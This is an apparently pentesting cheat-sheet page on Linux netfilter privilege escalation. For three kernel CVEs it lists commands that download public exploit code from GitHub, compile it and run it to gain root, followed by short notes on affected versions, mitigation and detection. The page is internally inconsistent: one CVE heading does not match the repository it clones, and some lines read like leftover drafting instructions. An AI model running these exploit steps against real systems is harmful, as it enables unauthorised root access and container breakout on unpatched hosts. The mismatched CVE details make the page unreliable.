search
LinkedInGithub
githubEdit

netfilter

It is a linux kernel module that provides, packet filtering, network address translation, and other tolls relevant to firewalls.

Check kernel version

uname -r

Affected version 2.6 - 5.11 (CVE-2021-22555arrow-up-right)

wget https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
gcc -m32 -static exploit.c -o exploit
./exploit

Affects Linux kernel 5.4 through 5.6.10 (CVE-2022-1015arrow-up-right)

git clone https://github.com/Bonfee/CVE-2022-25636.git
cd CVE-2022-25636
make
./exploit

Affected Linux Kernel up to version 6.3.1 (CVE-2023-32233arrow-up-right)

git clone https://github.com/Liuk3r/CVE-2023-32233
cd CVE-2023-32233
gcc -Wall -o exploit exploit.c -lmnl -lnftnl
./exploit

hashtag
Check kernel version

hashtag
Download exploit

hashtag
Compile exploit (32-bit)

hashtag
Run exploit

hashtag
Verify root access

hashtag
Key Concepts:

  • Netfilter:

    • Linux kernel framework for packet filtering, NAT, etc.

    • Core component of Linux firewalls.

  • iptables/nftables:

    • User-space tools for managing Netfilter rules.

  • Vulnerabilities:

    • Various vulnerabilities have been found in Netfilter, leading to privilege escalation.

    • Use-After-Free: A common type of vulnerability, where a program attempts to use memory after it has been freed.

    • Out-of-bounds write: A memory safety violation where a program writes data beyond the allocated buffer.

Vulnerabilities and Exploitation:

  1. CVE-2021-22555:

    • Affected kernel versions: 2.6 - 5.11.

    • Exploitation:

      • Download and compile the exploit.

      • Run the exploit.

    • Mitigation: Update the kernel.

  2. CVE-2022-25636:

    • Affected kernel versions: 5.4 - 5.6.10.

    • Exploitation:

      • Download and compile the exploit.

      • Run the exploit.

      • Warning: This exploit can cause system instability.

    • Mitigation: Update the kernel.

  3. CVE-2023-32233:

    • Affected kernel versions: up to 6.3.1.

    • Exploits anonymous sets in nftables.

    • Exploitation:

      • Download and compile the exploit.

      • Run the exploit.

    • Mitigation: Update the kernel.

Important Considerations and Enhancements:

  • Vulnerability Severity:

    • These vulnerabilities are critical.

    • They allow local privilege escalation.

  • Patching:

    • Kernel updates are essential.

  • Exploit Reliability:

    • Exploits can be unstable.

    • System instability or crashes may occur.

  • Real-World Scenarios:

    • Emphasize the risks in production environments.

    • Older, unpatched systems are highly vulnerable.

  • Container Security:

    • Highlight the importance of kernel security in containerized environments.

    • Container breakout is possible if the host kernel is vulnerable.

  • Detection:

    • Monitor for suspicious Netfilter activity.

    • Use intrusion detection systems.

  • Kernel versions: Always make sure the exploit is compatible with the target kernel.

  • Netfilter deep dive: More information could be provided about the inner workings of netfilter.

PreviousNagios core < 4.2.4NextGet/list NFS shared files

Last updated